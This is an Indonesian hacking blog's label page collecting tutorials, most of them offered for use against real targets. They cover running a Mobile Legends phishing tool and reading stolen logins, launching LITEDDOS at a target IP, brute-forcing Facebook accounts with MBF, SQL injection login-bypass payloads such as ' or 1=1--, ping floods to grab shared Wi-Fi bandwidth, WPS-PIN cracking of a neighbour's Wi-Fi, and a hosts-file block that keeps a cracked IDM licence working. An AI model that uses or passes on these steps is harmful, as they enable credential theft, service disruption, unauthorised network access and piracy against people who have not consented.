Tampilkan postingan dengan label Hack. Tampilkan semua postingan
Tampilkan postingan dengan label Hack. Tampilkan semua postingan

Rabu, 26 September 2018

Cara Phising Game Mobile Legend Di Android Dengan Termux

Pada artikel kali ini saya akan memberikan tutorial cara phising game Mobile Legend di termux xbizvej. Mobile Legend Atau yang sering disebut ML merupakan salah satu game online MOBA yang banyak di mainkan oleh anak remaja ataupun orang dewasa saat ini.

Nah phising game ML ini sama saja seperti tool phising lainnya, Namun semua hasil phising game ini tersimpan dalam file yang bernama buku.txt, Baiklah langsung saja kita ke tutorial cara phising game ML di termux xbizvej... 

  • download aplikasi termux xbizvej untuk android
  • SINI
  • Karena tool phising ini menggunakan bahasa python, maka kalian harus menginstsall python terlebih dahulu
  • $ apt install python2
  • Kalian juga harus menginstall apache2 dan php.Baca juga 
  • $ apt install apache2 
    $ apt install php
  • Untuk meng clone tool PhisingGame nya kalian harus install git terlebih dahulu
  • $ apt install git
  • Kemudian clone tool PhisingGame nya
  • $ git clone https://github.com/Senitopeng/PhisingGame.git
  • Masuk ke directory nya
  • $ cd PhisingGame
  • Untuk menjalankan tool nya tulis command berikut
  • $ python2 phising.py
  • Lalu tulis angka 2, Akan muncul sebuah link http://127.0.0.1:8080 seperti gambar dibawah ini

  • Kalian tinggal menyebarkannya, Bila sudah ada yang login kalian dapat melihat hasilnya dengan cara buka session baru, kemudian tulis perintah berikut ini
  • $ cd PhisingGame $ cat buku.txt

Senin, 24 September 2018

Cara DDOS Di Android Dengan Termux Menggunakan LITEDDOS

Pada artikel kali ini saya akan memberikan tutorial cara DDOS di termux menggunakan LITEDDOS, DDOS Merupakan suatu serangan yang di lakukan terhadap suatu website dengan cara memberikan ping sebanyak-banyaknya dengan tujuan agar website tersebut down atau tidak bisa di akses kembali.





Yuk langsung saja kita ke tutorialnya.....

  • download aplikasi termux xbizvej untuk android
  • SINI
  • Karena tools LITEDDOS menggunakan bahasa pemrograman python, kalian harus menginstall bahasa python terlebih dahulu
  • $ apt install python2
  • Install juga git dengan perintah
  • $ apt install git
  • Selanjutnya kalian harus meng clone tools nya dari github dengan perintah
  • $ git clone https://github.com/4L13199/LITEDDOS
  • Tunggu sampai proses cloning selesai
  • Masuk ke directory nya dengan perintah
  • $ cd LITEDDOS
  • Sekarang kalian tinggal menjalankan tools nya dengan perintah
  • $ python2 LITEDDOS.py [ip target] [port] [jumlah ping]
  • Contoh
  • $ python2 LITEDDOS.py 148.118.86.37 80 1000

Sekian tutorial cara ddos di termux menggunakan LITEDDOS,

Jumat, 21 September 2018

Cara Hack FB Menggunakan MBF Di Termux

Pada artikel kali ini saya akan memberikan tutorial cara hack fb di termux menggunakan MBF (Multi BruteForce).

Tool ini merupakan tool yg bisa mengumpulkan ID dari daftar teman facebook dan anggota grup facebook kalian dan bekerja seperti bruteforce, yang membedakan adalah jika bruteforce biasa menggunakan 1 akun/ID dengan banyak password tetapi tool multi bruteforce ini bekerja dengan cara menggunakan banyak akun dan satu password.

Yuk langsung saja ke tutorialnya....

  • download aplikasi termux xbizvej untuk android
  • SINI
  • Install python2 dan git
  • $ pkg install python2 
    $ pkg install git
  • Install mechanize
  • pip2 install mechanize
  • Clone tool mbf nya dengan perintah
  • $ git clone https://github.com/pirmansx/mbf
  • Masuk ke directory nya
  • $ cd mbf
  • Jalankan tool nya dengan perintah
  • $ python2 MBF.py
  • Tampilan tool nya seperti dibawah ini


  • Pilih nomor 1 kemudian masukan email dan password kalian
  • Tunggu sampai proses nya selesai, tulis l kemudian masukan password

Kamis, 20 September 2018

Cara Melihat Informasi Cuaca Di Termux

Pada artikel kali ini saya akan memberi tutorial cara melihat informasi cuaca di termux. Informasi cuaca di termux ini menampilkan info cuaca pada pagi hari,siang dan malam hari sesuai dengan daerah kita.

Langsung saja kita ke tutorial bagaimana cara melihat informasi cuaca di termux.



  • Buka Termux by Xbizvej di SINI
  • Install lah curl dengan perintah
  • $ pkg install curl
  • Setelah itu kita akan melihat info cuaca di daerah kita dengan perintah
  • $ curl http://wttr.in/namakota
  • Kalian tinggal ubah saja nama kota dengan kota kalian contohnya :
$ curl http://wttr.in/jakarta
Setelah itu akan muncul info cuaca pada daerah kita seperti suhu,dan yang pastinya cuaca pada pagi,siang dan malam hari.

Rabu, 03 Januari 2018

Cara Memperbaiki Fake Serial Key IDM

Berikut saya akan akan memberikan sedikit tips untuk mengatasi IDM yang terdeteksi sebagai fake serial. Cara ini berjalan pada Internet Download Manager (IDM  6.27 Build 3) 2017.
IDM Fake Serial Key
Pesan ini akan muncul ketika kita menggunakan IDM yang bertuliskan : ‘Internet Download manager has been registered with a fake Serial Number or the Serial Number has been blocked. Be aware that the cracked product may work incorrectly and download files with errors. Thus we advise you to purchase the full-featured product’.
Cara mudah untuk memperbaiki/mengakalinya adalah sebagai berikut:
Editing Hosts file / Ubah File Hosts

  1. Cari to C:\Windows\System32\drivers\etc\
  2. Buka file hosts dengan text editor. (Seperti Notepad,Notepad++,dll)
  3. Copy dan paste kode dibawah ini:
    127.0.0.1 tonec.com
    127.0.0.1 http://www.tonec.com127.0.0.1 registeridm.com
    127.0.0.1 http://www.registeridm.com
    127.0.0.1 secure.registeridm.com
    127.0.0.1 internetdownloadmanager.com
    127.0.0.1 http://www.internetdownloadmanager.com
    127.0.0.1 secure.internetdownloadmanager.com
    127.0.0.1 mirror.internetdownloadmanager.com
    127.0.0.1 mirror2.internetdownloadmanager.com
    127.0.0.1 mirror3.internetdownloadmanager.com
  4. Simpan file.

Rabu, 13 Juli 2016

SQL Injection Login Bypass

Di artikel kali ini saya mencoba menjelaskan cara melewati form login, sesuai namanya trik bypass berarti kita seolah menuju suatu tempat naek pesawat bukan dengan mobil yang lewat daratan dimana banyak rintangan terutama polantas !

berikut contoh sebuah command login.
Code:
$query = "select * from user where username='".$_POST['user']."' AND password='".md5($_POST['pass'])."'";

pada login yang valid (dari admin beneran), query akan menjadi seperti ini:

Code: 
$query = "select * from user where username='admin' AND password='dlfjoew8r509ewrjeowru94efjlsj'";

query tersebut benar, dan benar2 melakukan pengecekan apakah user admin dengan password dlfjoew8r509ewrjeowru94efjlsj ada di database. jika tidak ada, return false dan tidak bisa login. jika ada, return true dan login.

Code:
username='admin' AND password='dlfjoew8r509ewrjeowru94efjlsj'

kedua hal tersebut adalah statement yg di cek oleh query mysql.

namun ternyata pengecekan tersebut bisa di lewati dengan membuat query memberikan return true. kita hanya perlu membuat query selalu memberikan nilai benar. salah satu yg bisa kita lakukan adalah dengan menambahkan statement OR dengan statement yg memberikan return true. misal 1=1
Code:
OR 1=1

sehingga, kita perlu membuat query menjadi seperti ini :

Code: 
$query = "select * from user where username='admin' OR 1=1 AND password='dlfjoew8r509ewrjeowru94efjlsj' OR 1=1";

sehingga, user yg perlu kita masukan adalah :   admin' OR 1=1

beberapa admin yg cukup pintar, sudah membuat script query nya lengkap dengan tnda petik untuk menghindari error.

Code: 
$query = "select * from user where username='".$_POST['user']."' AND password='".md5($_POST['pass'])."'";

sehingga, dengan user : admin' OR 1=1        query akan menjadi seperti ini:

Code: 
$query = "select * from user where username='admin' OR 1=1' AND password='".md5($_POST['pass'])."'";

apa yg terjadi? query error karena kelebihan 1 tanda petik (lihat di belakang angka 1). dan tentu saja return yg di berikan tidak akan true. otomatis login gagal. untuk itu, kita perlu men-terminate script query tersebut. yaitu dengan memberikan comment mysql: --

Sehingga, user yg bisa kita masukkan adalah: admin' or 1=1--

Code: 
$query = "select * from user where username='admin' or 1=1--' AND password='".md5($_POST['pass'])."'";

dengan demikian, pengecekan di belakang coment akan di lewati. dan return dari query akan selalu true. perhatikan hukum logika berikut pada argument AND:

Code:
true AND true = true
true AND false = false
false AND false = false
false AND true = false

"AND" membandingkan true dengan true. jika kedua terbanding bernilai true, maka return true. jika salah satu atau kedua nya false, maka return false.

namun, berbeda dengan OR.

Code:
true OR true = true
true OR false = true
false OR true = true
false OR false =  false

jika salah satu TRUE, maka return akan memberikan TRUE.

Nah, perhatikan query setellah di inject:

Code: 
$query = "select * from user where username='admin' or 1=1--' AND password='".md5($_POST['pass'])."'";

1=1 ----> true
admin OR true = true

walapun user admin tidak pernah ada, maka query akan selalu memberikan nilai true, karena 1=1 adalah benar (true).

kita bisa tanpa memberikan username sama sekali. sehingga injeksi akan menjadi seperti ini jika kita menggunakan username dan password yg sama : ' or 1=1--

Code: 
$query = "select * from user where username='' or 1=1--' AND password='' or 1=1--'";

hal yg perlu kita perhatikan untuk bypass login adalah nilai true yg di keluarkan dan tidak terjadinya error pada script. sehingga penggunaan tanda baca sangat fatal pada injeksi seperti ini.

dengan memperhatikan output nilai true dan script berjalan dengan benar (tanpa error), kita bisa mencoba berbagai variasi username dan password untuk bisa login. misal

Code: 
a' or 'a'='a

dengan demikian, kita telah memanipulasi query menjadi seperti ini:

Code:
$query = "select * from user where username='a' or 'a'='a' AND password='a' or 'a'='a'";

tidak ada tanda kutip yang tidak tertutup, sehingga query berjalan lancar. statement OR memberikan nilai true, karena 'a'='a' adalah benar. mysql query memang sangat peka terhadap tanda petik. jangan ada tanda petik yg tidak tertutup.

berbagai variasi injeksi login seperti berikut:

Code: 
' or 1=1
' or '1'='1'
1' or 1=1
1' or '1'='1'
' or 'z'='z
dll, sesuai kreasi kita.

beberapa admin ada yg biasa menggunakan petik ganda dalam codingnya.

Code: 
$query = 'select * from user where username="admin" or 1=1-- AND password="'.md5($_POST["pass"]).'"';

hal tersebut sah sah aja, karena penggunaan tanda baca masih tepat. dengan demikian, injeksi akan sedikit berubah.

Code: 
" or 1=1
" or "1"="1
a" or "a"="a
" or "a"="a

Pengethuan tentang query mysql sangat penting dalam hal ini. sehingga kita bisa memanipulasi, memainkan injeksi untuk membypass login admin. karena, administrator biasanya berbeda orang berbeda pula cara coding. sehingga berbagai variasi injeksi akan sangat mungkin terjadi.

Selasa, 15 Maret 2016

Membuat Email Aktif Sementara


Sesuai dengan namanya, website ini menyediakan layanan email untuk 10 menit saja, dan bisa diperpanjang kalau kamu suka. Fiturnya sama seperti penyedia email lainnya, tapi akan expire dalam waktu 10 menit.
Selain agar tidak lama mikir id dan pass yang lupa ataupun buat akun email baru. Web ini juga akan membuat kalian tetap menjadi 'anonymous' di web apapun yang memerlukan verifikasi email.

Langsung klik bawah sini

10minutemail.com

Kamis, 10 Maret 2016

Cara Menyedot Bandwith dan mempercepat internet dengan CMD 2016

Cara ini bertujuan untuk menyedot bandwith yang sedang digunakan oleh orang lain dalam satu jaringan hotspot/wifi. jadi tujuan adalah untuk mempercepat koneksi internet kita di bandingka dengan orang lain dalam satu jaringan wifi/hostpot.

1. Buka CMD lalu ketikan ipconfig/all terus enter
    Perintah fungsinya untuk menampilkan informasi seputar koneksi dimana sobat berada sekarang.




    Setelah di enter maka hasilnya seperti yang diatas, yang berisi informasi tentang komputer sobat.

2. Lalu cari yang namanya DNS Server, seperti yang ada di dalam kolom warna orange,  lihat kode yang ada di sebelahnya, dan kode itu ingat saja. 





3. Kemudian ketikkan perintah seperti berikut ini, ping -l 1000 192.168.1.1 -t. kode 192.168.1.1 ini berasal dari DNS server sobat sendiri.




Kemudian tekan enter, maka hasilnya akan terlihat seperti gambar yang diatas.
CMD tadi jangan di tutup cukup di minimize saja dan biarkan berjalan selama sobat masih online

Jika menurut sobat internetnya kurang cepat, sobat bisa menambah 1000 menjadi 2000 atau banyakan juga bisa....

Cara ini cukup efektif  menurut saya.
Sekian dulu yaa.... semoga bermanfaat ;)


Update
Cara lain untuk meningkatkan internet dengan CMD


  1. Cara pertama mempercepat koneksi internet dari CMD
  • Langkah pertama adalah membuka CMD. Cara untuk masuk ke CMD yaitu klik tombol start, maka pada bagian paling bawah akan terlihat tulisan “search Program And Files”, maka ketikkan CMD pada kursor yang berkedip-kedip tersebut.
  • Kemudian akan muncul halaman baru dan pilih program (1) klik pada tulisan CMD.
  • Setelah muncul layar hitam, ketikkan perintah ipconfig/all pada layar CMD.
  • Selanjutnya carilah DNS servers, dan catatlah agar Anda tidak lupa misalnya DNS server yang ada adalah 0.0.0.0 maka ketikkan perintah di CMD ping –| 50000 0.0.0.0 –t.
  • Jika semua sudah Anda lakukan jangan menutup CMD dan biarkan CMD tetap berjalan, Anda boleh me-minimize sambil bekerja.
  1. Cara kedua untuk mempercepat koneksi internet dari CMD

  • Langkah pertama adalah membuka CMD, caranya sama dengan cara diatas.
  • Kemudian setelah CMD terbuka gantilah alamatnya ke Drive C:\ caranya yaitu Anda tinggal mengetikkan cd C/ kemudian tekan enter.
  • Selanjutnya ketik perintah seperti berikut ini “netsh interface tcp set global autotuning=disable.
  • Dan jangan matikan CMD, cukup di minimize saja.

Hack/Bypass/Lihat Password Wifi PIN Router

Selamat Pagi , Siang , Sore , maupun Malam Para pengunjung ....
Kali ini saya akan membagikan cara untuk mengetahui password wifi Indihome , speedy tetangga agan agan sekalian , jadi agan bisa konek wifi tersebut dengan gratis. 

Disini saya menggunakan 2 buah Software yaitu :
  1. WPS-PIN     : berfungsi untuk melihat Pin pada access point targe
  2. JUMSTART  : perantara untuk mengkoneksikan Wifi melalui Pin pada access point


Setelah kedua software tersebut sudah di download dan terinstal di masing masing laptop / PC Agan
Pertama tama yang harus disiapkan adalah mencari targer wifi , saya sarankan anda mencari target wifi yang sebelum anda memasukan password ada Dialog gambar Router yang bertuliskan
 "You can also connect by pushing the button on the router


Biasanya Pengguna Indihome seperti ini dan bisa dijadikan target

Setelah Mendapatkan target kemudian buka software WPS-Pin yang sudah di download tadi dan kemudian centang "Mostrar Pin para todas la redes" Setelah itu pilih nama targer wifi yang sudah anda tentukan dengan cara mengeklik 2x , setelah itu akan muncul seperti gambar berikut ini 


Setelah itu kita mengambil Pin dengan cara memilih PIN 1 , di sample di atas terlihat bahwa kita telah mendapatkan Pin dengan angka 44212926 . Kita telah mendapatkan Pin access point pada router wifi yang telah kita targetkan.

Lalu buka aplikasi JUMPSTART yang telah anda download sebelumnya , Kemudian pilih "Join a wireless network " dan kemudian Klik Next 



Setelah itu anda dapat memilih pada pilihan yang bawah sendiri "Enter the PIN from my access point" dan kemudian masukan Pin access point yang tadi telah kita dapat pada Text Box "Access point PIN"

Setelah itu tunggu beberapa waktu hingga proses berjalan untuk mencoba berinteraksi dengan router

Nah , digambar dibawah ini terlihat laptop anda sudah berhasil konek dengan router tetangga anda :v

Sekarang, kita akan mencoba lihat password wifi yang berhasil di konekkan dengan laptop kita dengan cara klik kanan wifi kemudian pilih properties
Lalu centang checkbox "show character"
Nah , disini sudah terlihat passwordnya adalah 4220XXX

Sekarang anda sudah dapat berinternetan dengan wifi tetangga anda dan tidak perlu bimbang karena tidak tau passwordnya, cukup sekian tutorial yang saya sampaikan semoga bermanfaat untuk anda yang sedang membutuhkan tutorial ini . Jika bingung / terjadi apa - apa bisa hubungi saya atau tinggalkan komentar dibawah ini. Terimakasih